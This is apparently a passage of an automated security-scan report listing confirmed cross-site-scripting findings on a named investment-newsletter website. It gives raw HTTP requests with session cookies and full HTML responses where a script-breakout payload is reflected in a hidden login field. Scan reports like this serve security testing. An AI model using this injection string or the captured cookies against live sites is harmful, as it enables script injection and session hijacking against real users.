// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/'"--></style></script><script>netsparker(0x003B57)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/pal_title_sm.gif" alt="The S&A Alliance" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p> <font size="2" face="Verdana, Arial, Helvetica, sans-serif">The<em> S&amp;A Alliance</em> is our most exclusive lifetime membership service. </font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> Alliance members are our most elite subscribers who pay a one-time fee (c..
- /responses/system_error.asp

/responses/system_error.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/btr/issues/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PBAOLMLBLAOGFFOELCCOEMHM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CDGBMFABKFKGIKOPGAIGEPEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /responses/system_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/ICA/default.aspx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PBAOLMLBLAOGFFOELCCOEMHM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CDGBMFABKFKGIKOPGAIGEPEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/digest/2008/html/20080916_Digest/'"--></style></script><script>netsparker(0x003DFF)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12261
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/psi/issues/index/'"--></style></script><script>netsparker(0x003DFF)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>

<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" class="mid_font">
<tr>
<td height="259">
<div align="center">
<p><strong>Our System is Not Responding </strong><br>
<br>
You may experience intermittent delays. We apologize for this inconvenience.</p>
<p><FONT color=#990000><FONT
color=#666666><font color="#000000"><strong>While we are working to correct the problem, you can: </strong></font></FONT></FONT></p>
<table width="50%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td width="2%"><strong>&#8226;</strong></td>
<td width="98%"><span class="mid_font">Try again by hitting the Back, Refresh or Reload buttons on your web browser </span></td>
</tr>
<tr align="left" valign="top">
<td><strong>&#8226;</strong></td>
<td><span class="mid_font">Try your request again later today </span></td>
</tr>
</table>
<p>If you need immediate assistance, please call 1-888-261-2693</p>
<p>Thank you.<FONT color=#990000><B><FONT
color=#666666> </FONT></B></FONT></p>
</div>
<div align="center"></div>
</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>
- /pub/gld/

/pub/gld/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
